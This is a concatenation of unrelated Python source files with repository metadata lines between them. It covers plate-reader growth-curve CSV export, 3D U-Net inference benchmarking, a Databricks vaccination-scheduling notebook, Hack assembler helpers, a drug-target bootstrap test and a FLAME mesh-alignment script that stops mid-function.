self._setDefaultParameter('smoothingK',k)
def setSmoothingS(self,s):
"""Set smoothing factor used to choose the number of knots."""
self._setDefaultParameter('smoothingS',s)
def setSlidingWindowSize(self,win):
"""
Set number of datapoints of sliding windows.
The value that is used for local exponential fit (growth rate) and linear regression (growth yield).
"""
self._setDefaultParameter('slidingWindowSize',win)
@staticmethod
def guessWellIds(numberOfWells):
"""
Return well ids by guessing the plate layout based on number of wells.
This function will return A1-P24 or A1-H12.
:param numberOfWells: number of wells of the plate
:type numberOfWells: int
:return: list(str) -- the guessed well ids (None if layout could not be guessed)
"""
# some "heuristics" about well ids: A1-P24 or A1-H12
if numberOfWells == 384:
labeldivisor=24
elif numberOfWells == 96:
labeldivisor=12
else:
return None
rowlabels=[chr(x) for x in range(ord('A'), ord('P') + 1)]
wellids=[]
for i in range(numberOfWells):
(lblchar,lblnum)=divmod(i, labeldivisor)
wellids.append(str(rowlabels[lblchar])+str(lblnum+1))
return wellids
@staticmethod
def availableColumnsForCsvExport(logOdDerivativeProperties=True):
"""
List the available properties that can be chosen for csv export.
:param logOdDerivativeProperties: include properties determined from log(OD) derivative
:type logOdDerivativeProperties: bool
:return: list(str), list(str) -- fixed columns (ids), properties
The 'fixed columns' list contains the sample/condition tuples
which should always be exported in order to identify the
replicates. For the other properties (except 'wellids') the
variance can be chosen by adding '_var' to the property name.
"""
fixedcolumns=['sample','condition']
columns=[]
columns.extend(['slope_linear',
'intercept_linear',
'timeOfMax_linear',
'lag_linear'])
columns.extend(['doublingtime_expfit',
'growthrate_expfit',
'od0_expfit',
'timeOfMax_expfit',
'lag_expfit'])
if logOdDerivativeProperties:
columns.extend(['doublingtime_local',
'growthrate_local',
'od0_local',
'timeOfMax_local',
'lag_local'])
columns.extend(['yield',
'timeOfYield'])
columns.extend(['wellids'])
return fixedcolumns, columns
def growthParametersToCsv(self,filename,addVarianceColumns=True,singleWells=False, columns=None, progressCall=None,
**csvkwargs):
"""
Write a "comma seperated values" (csv) file of properties for all replicate groups.
:param filename: Filename.
:type filename: string
:param columns: List of properties that shall get exported (in that order).
:type columns: list(str)
:param addVarianceColumns: For each entry in columns add the corresponding variance
:type addVarianceColumns: bool
:param singleWells: Export properties of single well replicates instead of replicate groups
:type singleWells: bool
:param progressCall: Function that will be called on each iteration.
:type progressCall: @fun(int)
:param csvkwargs: Parameters which are passed on to the csv module; defaults to { 'dialect': 'excel' }
:type csvkwargs: dict()
"""
if 'dialect' not in csvkwargs:
csvkwargs['dialect']='excel'
col2collabel={
'lag_expfit': 'lag_expfit (ln(OD) == lagAtCutoff)',
'lag_expfit_var': 'lag_expfit_var (ln(OD) == lagAtCutoff)',
'lag_local': 'lag_local (ln(OD) == lagAtCutoff)',
'lag_local_var': 'lag_local_var (ln(OD) == lagAtCutoff)',
}
if columns is None:
columns, morecolumns=Plate.availableColumnsForCsvExport()
columns.extend(morecolumns)
if addVarianceColumns and not singleWells:
newcolums=[]
for col in columns:
newcolums.append(col)
if col in ['sample','condition','wellids']:
continue
if not col.endswith('_var') and col+'_var' not in columns:
newcolums.append(col+'_var')
columns=newcolums
if singleWells:
replicates=self.nonBackgroundWells()
else:
replicates=self.nonBackgroundReplicates()
with CsvFileUnicodeWriter(filename,**csvkwargs) as sliwriter:
descrow=[]
for col in columns:
if col in col2collabel:
descrow.append(col2collabel[col])
else:
descrow.append(col)
sliwriter.writerow(descrow)
allcnt=-1
for tc in replicates:
allcnt+=1
if progressCall is not None:
progressCall(allcnt)
if tc.od() is not None:
doublingtime_ef=None
doublingtimevar_ef=None
doublingtime_nls=None
doublingtimevar_nls=None
lag_linear=None
lagVar_linear=None
mu_ef, mu_ef_var, od0_ef, od0_ef_var, maxt_ef, maxt_ef_var, lag_ef, lag_ef_var, method_ef, status = tc.maxGrowthrate()
mu_nls, mu_nls_var, od0_nls, od0_nls_var, maxt_nls, maxt_nls_var, lag_nls, lag_nls_var, method_nls, status = tc.maxGrowthrateFromLogOdDerivative()
growthyield, growthyield_var, tgrowthyield, tgrowthyield_var, status=tc.growthyield()
slope_linear, slopeVar_linear, intercept_linear, interceptVar_linear, timeOfMax_linear, timeOfMaxVar_linear, timeOfMaxIndices_linear, plainSlopeStatus=tc.odSlopemaxIntercept()
doublingtime_ef, doublingtimevar_ef=Replicate.growthrateToDoublingTime(mu_ef,mu_ef_var)
doublingtime_nls, doublingtimevar_nls=Replicate.growthrateToDoublingTime(mu_nls,mu_nls_var)
if slope_linear is not None and slope_linear != 0:
lag_linear=-intercept_linear/(slope_linear)
if slopeVar_linear is not None and interceptVar_linear is not None:
lagVar_linear=((intercept_linear/(slope_linear**2))**2 * slopeVar_linear +
1/slope_linear**2 * interceptVar_linear)
else:
(doublingtime_ef, doublingtimevar_ef, doublingtime_nls, doublingtimevar_nls)=(None,None,None,None)
(mu_ef, mu_ef_var, od0_ef, od0_ef_var, maxt_ef, maxt_ef_var, lag_ef, lag_ef_var)=([None,None,None,None,None,None,None,None])
(mu_nls, mu_nls_var, od0_nls, od0_nls_var, maxt_nls, maxt_nls_var, lag_nls, lag_nls_var)=([None,None,None,None,None,None,None,None])
(growthyield,growthyield_var,tgrowthyield,tgrowthyield_var)=([None,None,None,None])
(slope_linear, slopeVar_linear, intercept_linear, interceptVar_linear,
timeOfMax_linear, timeOfMaxVar_linear, lag_linear, lagVar_linear)=([None,None,None,None,None,None,None,None])
thisrow=[]
for col in columns:
if col == 'sample':
thisrow.append(tc.sampleid)
elif col == 'condition':
thisrow.append(tc.condition)
elif col == 'slope_linear':
thisrow.append(slope_linear)
elif col == 'slope_linear_var':
thisrow.append(slopeVar_linear)
elif col == 'intercept_linear':
thisrow.append(intercept_linear)
elif col == 'intercept_linear_var':
thisrow.append(interceptVar_linear)
elif col == 'timeOfMax_linear':
thisrow.append(timeOfMax_linear)
elif col == 'timeOfMax_linear_var':
thisrow.append(timeOfMaxVar_linear)
elif col == 'lag_linear':
thisrow.append(lag_linear)
elif col == 'lag_linear_var':
thisrow.append(lagVar_linear)
elif col == 'doublingtime_expfit':
thisrow.append(doublingtime_ef)
elif col == 'doublingtime_expfit_var':
thisrow.append(doublingtimevar_ef)
elif col == 'growthrate_expfit':
thisrow.append(mu_ef)
elif col == 'growthrate_expfit_var':
thisrow.append(mu_ef_var)
elif col == 'od0_expfit':
thisrow.append(od0_ef)
elif col == 'od0_expfit_var':
thisrow.append(od0_ef_var)
elif col == 'timeOfMax_expfit':
thisrow.append(maxt_ef)
elif col == 'timeOfMax_expfit_var':
thisrow.append(maxt_ef_var)
elif col == 'lag_expfit':
thisrow.append(lag_ef)
elif col == 'lag_expfit_var':
thisrow.append(lag_ef_var)
elif col == 'doublingtime_local':
thisrow.append(doublingtime_nls)
elif col == 'doublingtime_local_var':
thisrow.append(doublingtimevar_nls)
elif col == 'growthrate_local':
thisrow.append(mu_nls)
elif col == 'growthrate_local_var':
thisrow.append(mu_nls_var)
elif col == 'od0_local':
thisrow.append(od0_nls)
elif col == 'od0_local_var':
thisrow.append(od0_nls_var)
elif col == 'timeOfMax_local':
thisrow.append(maxt_nls)
elif col == 'timeOfMax_local_var':
thisrow.append(maxt_nls_var)
elif col == 'lag_local':
thisrow.append(lag_nls)
elif col == 'lag_local_var':
thisrow.append(lag_nls_var)
elif col == 'yield':
thisrow.append(growthyield)
elif col == 'yield_var':
thisrow.append(growthyield_var)
elif col == 'timeOfYield':
thisrow.append(tgrowthyield)
elif col == 'timeOfYield_var':
thisrow.append(tgrowthyield_var)
elif col == 'wellids':
thisrow.append(tc.activeChildWellIdStr())
else:
raise RuntimeError('unknown property '+col)
sliwriter.writerow(thisrow)
def timeseriesToCsv(self,filename,
addVarianceColumns=True,
singleWells=False,
columns=None,
fullId=False,
progressCall=None,
**csvkwargs):
"""
Write a "comma seperated values" (csv) file of time series for all replicate groups.
:param filename: Filename.
:type filename: string
:param columns: List of time series that shall get exported for each replicate.
:type columns: list(str)
:param addVarianceColumns: For each entry in columns add the corresponding variance
:type addVarianceColumns: bool
:param singleWells: Export time series of single well replicates instead of replicate groups
:type singleWells: bool
:param fullId: Label the columns with the full id (including well ids) instead of "sample condition"
:type fullId: bool
:param progressCall: Function that will be called on each iteration.
:type progressCall: @fun(int)
:param csvkwargs: Parameters which are passed on to the csv module; defaults to { 'dialect': 'excel' }
:type csvkwargs: dict()
"""
if 'dialect' not in csvkwargs:
csvkwargs['dialect']='excel'
col2collabel={
'od': 'OD',
'od_var': 'var(OD)',
'lnod': 'ln(OD)',
}
if columns is None:
columns=['od']
if addVarianceColumns and not singleWells:
newcolums=[]
for col in columns:
newcolums.append(col)
if col in ['lnod']:
continue
if not col.endswith('_var') and col+'_var' not in columns:
newcolums.append(col+'_var')
columns=newcolums
if singleWells:
replicates=self.nonBackgroundWells()
else:
replicates=self.nonBackgroundReplicates()
with CsvFileUnicodeWriter(filename,**csvkwargs) as sliwriter:
# header
descrow=['t']
for tc in replicates:
for col in columns:
if col in col2collabel:
lbl=col2collabel[col]
else:
lbl=col
if fullId:
lbl+=' '+tc.fullId()
else:
lbl+=' '+tc.sampleid+' '+tc.condition
if singleWells:
lbl+=' '+tc.activeChildWellIdStr()
descrow.append(lbl)
sliwriter.writerow(descrow)
# data
allcnt=-1
for ti in range(len(self.time)):
allcnt+=1
if progressCall is not None:
progressCall(allcnt)
thisrow=[]
thisrow.append(self.time[ti])
for tc in replicates:
for col in columns:
if col == 'od':
if tc.od() is not None:
thisrow.append(tc.od()[ti])
else:
thisrow.append(None)
elif col == 'od_var':
if tc.odVar() is not None:
thisrow.append(tc.odVar()[ti])
else:
thisrow.append(None)
elif col == 'lnod':
if tc.logOd() is not None:
thisrow.append(tc.logOd()[ti])
else:
thisrow.append(None)
else:
raise RuntimeError('unknown property '+col)
sliwriter.writerow(thisrow)
@staticmethod
def _numWellsToFormatString(numWells):
"""
Return a string uniquely identifying a plate format.
NOTE this function is subject to change.
"""
if numWells == 100:
return '100honeycomb'
elif numWells == 200:
return '200honeycomb'
return str(numWells)
@staticmethod
def writeMetadata(filename,metadata,metadataKeys,plateformat='96',**csvkwargs):
"""
:param metadata: the metadata
:type metadata: list(dict)
"""
columnMajorOrder=False
if plateformat == '96':
if len(metadata) != 96:
raise RuntimeError('metadata is not of length 96')
numcols=12
numrows=8
elif plateformat == '384':
if len(metadata) != 384:
raise RuntimeError('metadata is not of length 384')
numcols=24
numrows=16
elif plateformat == '200honeycomb':
if len(metadata) != 200:
raise RuntimeError('metadata is not of length 200')
columnMajorOrder=True
numcols=20 # number of columns in the layout of the exported metadata
numrows=10 # number of rows
if plateformat == '96' or plateformat == '384':
rowlabels=[chr(x) for x in range(ord('A'), ord('A') + numrows)]
collabels=[str(i+1) for i in range(numcols)]
elif plateformat == '200honeycomb':
rowlabels=[str(i) for i in range(1,numrows+1)]
collabels=[str(i+1) for i in range(0,len(metadata),numrows)]
else:
raise RuntimeError('not implemented for format other than 96, 384 or 200 honeycomb')
if columnMajorOrder:
reordered=[]
# transpose
for rowidx in range(numrows):
for colidx in range(numcols):
metentryidx=rowidx + colidx * numrows
reordered.append(metadata[metentryidx])
else:
reordered=metadata # keep order
if 'dialect' not in csvkwargs:
csvkwargs['dialect']='excel'
with CsvFileUnicodeWriter(filename,**csvkwargs) as writer:
# header: just the name of the metadata
for key in metadataKeys:
row=[key]
writer.writerow(row)
# the column ids
row=['<>']
row.extend(collabels)
writer.writerow(row)
# now the data, divided into rows of numcols columns
colit=reordered.__iter__()
for rowlab in rowlabels:
row=[rowlab]
for j in range(numcols):
thismeta=next(colit)
val=thismeta[key] if key in thismeta else None
row.append(val)
writer.writerow(row)
# an empty row
row=[]
writer.writerow(row)
@staticmethod
def readMetadata(filename,plateformat='96',**csvkwargs):
"""
Read metadata from a csv file.
For each metadata key a table is read. The table should be laid
out as according to the plate layout. To get a template, call
writeMetadata(outfile,[{} for i in range(numOfColumns)],Plate.metadataKeys)
"""
columnMajorOrder=False
if plateformat == '96':
numcols=12
numrows=8
elif plateformat == '384':
numcols=24
numrows=16
elif plateformat == '200honeycomb':
columnMajorOrder=True
numcols=20 # number of columns in the layout of the exported metadata
numrows=10 # number of rows
if plateformat == '96' or plateformat == '384':
rowlabels=[chr(x) for x in range(ord('A'), ord('A') + numrows)]
collabels=[str(i+1) for i in range(numcols)]
elif plateformat == '200honeycomb':
rowlabels=[str(i) for i in range(1,numrows+1)]
collabels=[str(i+1) for i in range(0,numcols*numrows,numrows)]
else:
raise RuntimeError('not implemented for format other than 96, 384 or 200 honeycomb')
# initialise the metadata list
metadata=[{} for i in range(numcols*numrows)]
if 'dialect' not in csvkwargs:
csvkwargs['dialect']='excel'
with CsvFileUnicodeReader(filename,**csvkwargs) as odreader:
nextlinemode='nada'
metkey=None
lineno=0
for row in odreader:
lineno+=1
if nextlinemode == 'nada':
if len(row) == 0 or row[0] == '':
# skip empty row
continue
else:
metkey=row[0]
nextlinemode='starttable'
elif nextlinemode == 'starttable':
if len(row) == 0:
raise Plate.BadMetadata('Row at start of table is empty',lineno,filename=filename)
if row[0] != '<>' or row[1] != '1' or len(row) != numcols+1:
raise Plate.BadMetadata('This does not look like the beginning of a table'+
', expected row[0] == "<>", row[1] == "1" and len(row) == '+str(numcols+1)+
', but got row[0]=="'+str(row[0])+'", row[1] == "'+str(row[1])+
'" and len(row) == '+str(len(row)),
lineno,filename=filename)
nextlinemode='intable'
rowcnt=0
metit=metadata.__iter__()
elif nextlinemode == 'intable':
rowcnt+=1
if len(row) == 0:
raise Plate.BadMetadata('Row '+str(rowcnt)+' is empty',lineno,filename=filename)
if row[0].upper() != rowlabels[rowcnt-1]:
raise Plate.BadMetadata('Row '+str(rowcnt)+' does not start with '+rowlabels[rowcnt-1]+
' (found "'+row[0].upper()+'")',lineno,filename=filename)
row.pop(0)
numOfValsThisRow=len(row)
if numOfValsThisRow > numcols:
numOfValsThisRow=numcols
# read the columns of this row
colit=row.__iter__()
for i in range(numOfValsThisRow):
val=next(colit)
if val == '':
# map empty sting to None
val=None
metentry=next(metit)
metentry[metkey]=val
# if the last columns are empty, fill them up with None
for i in range(numcols-numOfValsThisRow):
metentry=next(metit)
metentry[metkey]=None
if rowcnt == numrows:
nextlinemode='nada'
if columnMajorOrder:
reordered=[]
for colidx in range(numcols):
for rowidx in range(numrows):
metentryidx=rowidx * numcols + colidx
reordered.append(metadata[metentryidx])
metadata=reordered
return metadata
class Error(Exception):
"""Base class for exceptions in this module."""
pass
class MultipleBackgroundIdsError(Error):
"""Exception raised if there are different IDs for background wells."""
def __init__(self, backgroundSampleIds):
self._backgroundSampleIds = backgroundSampleIds
def __str__(self):
return str('multiple keys were found that could be background (blank) samples, make sure there is only one.' +
'\nThe keys are:\n'+str(self._backgroundSampleIds))
class UnknownFileFormat(Error):
"""Exception raised when an unsupported serialisation format is opened."""
def __init__(self,filename,serFormat=None,serFormatVersion=None,detailedError=None):
self.filename = filename
self.serFormat = serFormat
self.serFormatVersion = serFormatVersion
self.detailedError = detailedError
def __str__(self):
if self.serFormat is not None:
if self.serFormat.startswith('clsplates'):
message= 'You tried to open a Chronological Life Span (CLS) file ("'+self.filename+'"), please use the CLS analyser for this'
else:
message = 'Unsupported file format "'+self.serFormat+'"'
if self.serFormatVersion is not None:
message += ' version "'+self.serFormatVersion+'"'
message += ' in file "'+self.filename+'"'
else:
message = 'Unsupported file format in file "'+self.filename+'"'
if self.detailedError is not None:
message+=': '+self.detailedError+'.'
else:
message+='.'
return message
class BadMetadata(Error):
"""Exception raised when an unsupported serialisation format is opened."""
def __init__(self,detailedError=None,lineno=None,filename=None):
self.detailedError = detailedError
self.filename = filename
self.lineno = lineno
def __str__(self):
message = self.detailedError
if self.lineno is not None:
message += ' around line '+str(self.lineno)
if self.filename is not None:
message += ' in file '+str(self.filename)
return message
|
platereader/gathode
|
platereader/plate.py
|
plate.py
|
py
| 71,939 |
python
|
en
|
code
| 4 |
github-code
|
6
|
648697707
|
import numbers
import time
from itertools import product
import numpy as np
import torch
try:
from tqdm import tqdm
except ImportError:
def tqdm(x):
return x
def product1d(inrange):
for ii in inrange:
yield ii
def slice_to_start_stop(s, size):
"""For a single dimension with a given size, normalize slice to size.
Returns slice(None, 0) if slice is invalid."""
if s.step not in (None, 1):
raise ValueError('Nontrivial steps are not supported')
if s.start is None:
start = 0
elif -size <= s.start < 0:
start = size + s.start
elif s.start < -size or s.start >= size:
return slice(None, 0)
else:
start = s.start
if s.stop is None or s.stop > size:
stop = size
elif s.stop < 0:
stop = (size + s.stop)
else:
stop = s.stop
if stop < 1:
return slice(None, 0)
return slice(start, stop)
def int_to_start_stop(i, size):
"""For a single dimension with a given size, turn an int into slice(start, stop)
pair."""
if -size < i < 0:
start = i + size
elif i >= size or i < -size:
raise ValueError('Index ({}) out of range (0-{})'.format(i, size - 1))
else:
start = i
return slice(start, start + 1)
def normalize_slices(slices, shape):
""" Normalize slices to shape.
Normalize input, which can be a slice or a tuple of slices / ellipsis to
be of same length as shape and be in bounds of shape.
Args:
slices (int or slice or ellipsis or tuple[int or slice or ellipsis]): slices to be normalized
Returns:
tuple[slice]: normalized slices (start and stop are both non-None)
tuple[int]: which singleton dimensions should be squeezed out
"""
type_msg = 'Advanced selection inappropriate. ' \
'Only numbers, slices (`:`), and ellipsis (`...`) are valid indices (or tuples thereof)'
if isinstance(slices, tuple):
slices_lst = list(slices)
elif isinstance(slices, (numbers.Number, slice, type(Ellipsis))):
slices_lst = [slices]
else:
raise TypeError(type_msg)
ndim = len(shape)
if len([item for item in slices_lst if item != Ellipsis]) > ndim:
raise TypeError("Argument sequence too long")
elif len(slices_lst) < ndim and Ellipsis not in slices_lst:
slices_lst.append(Ellipsis)
normalized = []
found_ellipsis = False
squeeze = []
for item in slices_lst:
d = len(normalized)
if isinstance(item, slice):
normalized.append(slice_to_start_stop(item, shape[d]))
elif isinstance(item, numbers.Number):
squeeze.append(d)
normalized.append(int_to_start_stop(int(item), shape[d]))
elif isinstance(item, type(Ellipsis)):
if found_ellipsis:
raise ValueError("Only one ellipsis may be used")
found_ellipsis = True
while len(normalized) + (len(slices_lst) - d - 1) < ndim:
normalized.append(slice(0, shape[len(normalized)]))
else:
raise TypeError(type_msg)
return tuple(normalized), tuple(squeeze)
def blocking(shape, block_shape, roi=None, center_blocks_at_roi=False):
""" Generator for nd blocking.
Args:
shape (tuple): nd shape
block_shape (tuple): nd block shape
roi (tuple[slice]): region of interest (default: None)
center_blocks_at_roi (bool): if given a roi,
whether to center the blocks being generated
at the roi's origin (default: False)
"""
assert len(shape) == len(block_shape), "Invalid number of dimensions."
if roi is None:
# compute the ranges for the full shape
ranges = [range(sha // bsha if sha % bsha == 0 else sha // bsha + 1)
for sha, bsha in zip(shape, block_shape)]
min_coords = [0] * len(shape)
max_coords = shape
else:
# make sure that the roi is valid
roi, _ = normalize_slices(roi, shape)
ranges = [range(rr.start // bsha,
rr.stop // bsha if rr.stop % bsha == 0 else rr.stop // bsha + 1)
for rr, bsha in zip(roi, block_shape)]
min_coords = [rr.start for rr in roi]
max_coords = [rr.stop for rr in roi]
need_shift = False
if roi is not None and center_blocks_at_roi:
shift = [rr.start % bsha for rr, bsha in zip(roi, block_shape)]
need_shift = sum(shift) > 0
# product raises memory error for too large ranges,
# because input iterators are cast to tuple
# so far I have only seen this for 1d "open-ended" datasets
# and hence just implemented a workaround for this case,
# but it should be fairly easy to implement an nd version of product
# without casting to tuple for our use case using the imglib loop trick, see also
# https://stackoverflow.com/questions/8695422/why-do-i-get-a-memoryerror-with-itertools-product
try:
start_points = product(*ranges)
except MemoryError:
assert len(ranges) == 1
start_points = product1d(ranges)
for start_point in start_points:
positions = [sp * bshape for sp, bshape in zip(start_point, block_shape)]
if need_shift:
positions = [pos + sh for pos, sh in zip(positions, shift)]
if any(pos > maxc for pos, maxc in zip(positions, max_coords)):
continue
yield tuple(slice(max(pos, minc), min(pos + bsha, maxc))
for pos, bsha, minc, maxc in zip(positions, block_shape,
min_coords, max_coords))
def ensure_5d(tensor):
if tensor.ndim == 3:
tensor = tensor[None, None]
elif tensor.ndim == 4:
tensor = tensor[None]
elif tensor.ndim == 5:
pass
return tensor
# we don't save any output, because this is just for benchmarking purposes
def run_inference(input_dataset, model,
block_shape, halo,
preprocess,
precision):
dtype = torch.float32 if precision == 'single' else torch.float16
device = torch.device('cuda')
model.to(device, dtype=dtype)
model.eval()
shape = input_dataset.shape
full_block_shape = tuple(bs + 2 * ha for bs, ha in zip(block_shape, halo))
local_bb = tuple(slice(ha, bsh - ha)
for bsh, ha in zip(block_shape, halo))
def grow_bounding_box(bb):
grown_bb = tuple(slice(max(b.start - ha, 0), min(sh, b.stop + ha))
for b, ha, sh in zip(bb, halo, shape))
return grown_bb
def ensure_block_shape(input_):
if input_.shape != full_block_shape:
pad_shape = [(0, bsh - sh)
for bsh, sh in zip(full_block_shape, input_.shape)]
input_ = np.pad(input_, pad_shape)
return input_
blocks = list(blocking(shape, block_shape))
per_block_times = []
t_tot = time.time()
with torch.no_grad():
for bb in tqdm(blocks):
bb = grow_bounding_box(bb)
input_ = input_dataset[bb]
input_ = ensure_block_shape(input_)
input_ = preprocess(input_)
input_ = ensure_5d(input_)
t0 = time.time()
input_ = torch.from_numpy(input_).to(device, dtype=dtype)
output = model(input_)
output = output.cpu().to(dtype=torch.float32).numpy()
per_block_times.append(time.time() - t0)
# this is where we would save the output ...
output = output[0]
output = output[(slice(None),) + local_bb]
t_tot = time.time() - t_tot
return t_tot, per_block_times
|
constantinpape/3d-unet-benchmarks
|
bench_util/inference.py
|
inference.py
|
py
| 7,760 |
python
|
en
|
code
| 3 |
github-code
|
6
|
29007933984
|
# Databricks notebook source
from pyspark.sql.functions import expr, col
import pyspark.sql.functions as fn
sampleEmployee = spark.read.format("csv").option("header","true").load("dbfs:/FileStore/shared_uploads/[email protected]/us_500.csv")
# COMMAND ----------
employeeDF = sampleEmployee.withColumn('web', expr('explode(array_repeat(web,100))'))
# COMMAND ----------
employeeDF_grouped = employeeDF.groupby(['city'])
CityEmployeeDensity = employeeDF_grouped.agg(fn.count(col('email')).alias('countOfEmployees'))
# COMMAND ----------
employeeDF.createOrReplaceTempView("employeeDataFrame")
CityEmployeeDensity.createOrReplaceTempView("CityEmpDensity")
sequenceOfCityDF = sqlContext.sql(" select city, countOfEmployees, rank() over(order by countOfEmployees desc, city) as Sequence from CityEmpDensity ")
sequenceOfCityDF.createOrReplaceTempView("sequenceOfCityDataFrame")
VaccinationDrivePlan = sqlContext.sql(" SELECT EDF.*, SDF.Sequence FROM employeeDataFrame EDF INNER JOIN sequenceOfCityDataFrame SDF ON EDF.city = SDF.city ")
VaccinationDrivePlan.show()
# COMMAND ----------
VaccinationDrivePlan.createOrReplaceTempView("VaccinationlPlan")
noOfDaysVaccineDrive = sqlContext.sql("SELECT city, countOfEmployees, CEILING(countOfEmployees/100) as noOfDaysToCompleteVaccination FROM CityEmpDensity")
filnalVaccineDrive = noOfDaysVaccineDrive.withColumn('noOfDaysToCompleteVaccination', expr('explode(array_repeat(noOfDaysToCompleteVaccination,int(noOfDaysToCompleteVaccination)))'))
filnalVaccineDrive.createOrReplaceTempView("filnalVaccineDrive")
# COMMAND ----------
filnalVaccineSchedule_Sequential = sqlContext.sql("SELECT city,countOfEmployees AS countOfEmployeesOfCity, current_date() + ROW_NUMBER() OVER(order by countOfEmployees desc ) - 1 AS VaccineScheduleDate FROM filnalVaccineDrive")
filnalVaccineSchedule_Sequential.show()
# COMMAND ----------
filnalVaccineSchedule_Parallel = sqlContext.sql("SELECT city,countOfEmployees AS countOfEmployeesOfCity, current_date() + ROW_NUMBER() OVER(partition by city order by countOfEmployees desc ) - 1 AS VaccineScheduleDate FROM filnalVaccineDrive")
filnalVaccineSchedule_Parallel.show()
# COMMAND ----------
noOfDaysVaccineDriveForCity = noOfDaysVaccineDrive
noOfDaysVaccineDriveForCity.show()
# COMMAND ----------
|
bhaskar553/DatabricksAssignment
|
Vaccine Drive Assignment.py
|
Vaccine Drive Assignment.py
|
py
| 2,302 |
python
|
en
|
code
| 0 |
github-code
|
6
|
31273796258
|
#This file contains helpers that help the process of the assembler
#Helps to get the name of the new file
def fix_name(line, op = "//"):
opIndx = line.find(op)
if opIndx == -1: #Doesnt found the op
return line
elif opIndx == 0: #The comment is on the beginning of the line
return '' #Return nothing because it is ignored
else:
if op == "//":
line = line[:opIndx-1] #Because there are two elements
else:
line = line[:opIndx] #If it is other element just remove it
return line
#Functions to check if is a A command or C command or Label
def isLabel(line):
if line.find("(") != -1 and line.find(")") != -1:
if line[1:-1].strip() != '':
return True
else:
return False
else:
return False
#Function that checks if it is a A Command
def isA(line):
if line.find('@') != -1:
if line[1:].strip() != '':
return True
else:
return False
else:
return False
#Function that checks if it is a C Command
def isC(line):
if line.find("(") == -1 and line.find("@") == -1 and line != '':
return True
else:
return False
#Translate number to binary convertion
def binaryConverter(num):
binaryNum = "{:016b}".format(num)
return binaryNum
binaryNumber = lambda x: x >= 0 and str(bin(x))[2:] or "-" + str(bin(x))[3:] #First we get the number itself
#Try to parse an Integer for evaluatin porpuses
def parseInt(num):
try:
return int(num)
except ValueError:
return None
#Find if the a bit is from the A(0) or M(1)
def set_aBit(comp):
if comp.find('M') != -1:
return "1"
else:
return "0"
|
fcortesj/Computer_Architecture
|
proyectos/06/src/utils.py
|
utils.py
|
py
| 1,823 |
python
|
en
|
code
| 0 |
github-code
|
6
|
43734225885
|
# -*- coding: utf-8 -*-
"""
Created on Mon May 10 19:03:44 2021
@author: Samael Olascoaga
@email: [email protected]
"""
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
df = pd.read_csv('drugbank.csv')
overlap = []
for i in range(0, 1000000):
set1 = set(df['ID'].sample(n=550, replace=True))
set2 = set(df['ID'].sample(n=409, replace=True))
overlap.append(len(set1.intersection(set2)))
overlap = np.asarray(overlap, dtype=float)
p = ((overlap >= 182).sum() / i)
print(p)
sns.set_style("white")
sns.despine()
#sns.distplot(degree_list, kde=False, rug=False)
g = sns.histplot(overlap, log_scale=False, fill=False, color='k', bins=17)
sns.despine()
plt.ylabel("Frequency")
plt.xlabel("Overlap")
#plt.title("")
sns.despine()
fig = g.get_figure()
fig.savefig(r'target_bootstrap' + '.svg', format='svg', dpi=600, bbox_inches="tight")
|
Olascoaga/Senotherapy
|
bootstrapping_targets.py
|
bootstrapping_targets.py
|
py
| 938 |
python
|
en
|
code
| 1 |
github-code
|
6
|
21419147973
|
import numpy as np
from os.path import join
from psbody.mesh import Mesh
from fitting.landmarks import load_embedding, landmark_error_3d, mesh_points_by_barycentric_coordinates, load_picked_points
from fitting.util import load_binary_pickle, write_simple_obj, safe_mkdir, get_unit_factor
import open3d as o3d
import argparse, os
from tqdm import tqdm
import logging
logger = logging.getLogger(__name__)
def get_config():
parser = argparse.ArgumentParser(description='modify mean and std and orientation')
parser.add_argument("--scans", type=str, default= "mesh", help='path of the scan') # for a mesh path, replace 'mesh' to 'lmk' get its corresponding lmk path
parser.add_argument("--lmks", type=str, default= "lmk", help='path of the output')
parser.add_argument("--save", type=str, default= "lx_result", help='path of the output')
args = parser.parse_args()
return args
def x_rotate(v):
return v*[1, -1, -1]
def transl(v, old_mean, new_mean):
return v-old_mean+new_mean
def transl_scale(v, old_mean, old_std, new_mean, new_std):
return (v-old_mean)/old_std*new_std+new_mean
def modify_face(face):
return face
def get_vertice_mean_std(v):
return np.mean(v, axis=0), np.std(v)
def get_mean_std(filename):
mesh = Mesh(filename=filename)
if hasattr(mesh, 'f'):
mesh.f = modify_face(mesh.f) # TODO: 尚未确定是否需要扭转面片方向
mean = np.mean(mesh.v, axis=0)
std = np.std(mesh.v)
return mean, std, mesh
def flamefit_test():
eg = './data/scan.obj'
lmk = './data/scan_lmks.npy'
eg_mean, eg_std, eg_mesh = get_mean_std(eg) # mean x-y-z分开算, std整体算
eg_lmk = np.load(lmk)
print(f'my example scan mean: {eg_mean}, std: {eg_std}')
my_scan = "/mnt/cephfs/home/liuxu/cvte/tools/flame-fitting/data/test/mesh/3_pointcloud.obj"
my_lmk = "/mnt/cephfs/home/liuxu/cvte/tools/flame-fitting/data/test/lmk/3_pointcloud.npy"
mean, std, mesh = get_mean_std(my_scan)
lmk = np.load(my_lmk)
v = mesh.v
print(f'my origina scan mean: {mean}, std: {std}')
v = x_rotate(v)
lmk = x_rotate(lmk)
write_simple_obj(v, mesh.f if hasattr(mesh, 'f') else None, my_scan.replace('.obj', '_x.obj'))
np.save(my_lmk.replace('.npy', '_x.npy'), lmk)
mean, std = get_vertice_mean_std(v)
print(f'my rotated scan mean: {mean}, std: {std}')
v_transl = transl(v, mean, eg_mean)
lmk_transl = transl(lmk, mean, eg_mean)
write_simple_obj(v_transl, mesh.f if hasattr(mesh, 'f') else None, my_scan.replace('.obj', '_x_transl.obj'))
np.save(my_lmk.replace('.npy', '_x_transl.npy'), lmk_transl)
mean_transl, std_transl = get_vertice_mean_std(v_transl)
print(f'my transla scan mean: {mean_transl}, std: {std_transl}')
v = transl_scale(v, mean, std, eg_mean, eg_std)
lmk = transl_scale(lmk, mean, std, eg_mean, eg_std)
write_simple_obj(v, mesh.f if hasattr(mesh, 'f') else None, my_scan.replace('.obj', '_x_transl_scale.obj'))
np.save(my_lmk.replace('.npy', '_x_transl_scale.npy'), lmk)
mean, std = get_vertice_mean_std(v)
print(f'my tra_sca scan mean: {mean}, std: {std}')
# scale to similar size based on lmk
eg_lmk = eg_lmk - eg_mean
lmk = lmk - mean # 关键点相对于原点的坐标
times = np.mean(np.mean(eg_lmk/lmk, axis=1)) # 关键点的avg倍数
v = (v - mean)*times
lmk = lmk*times
mean, std = get_vertice_mean_std(v)
print(f'my fang_da scan mean: {mean}, std: {std}')
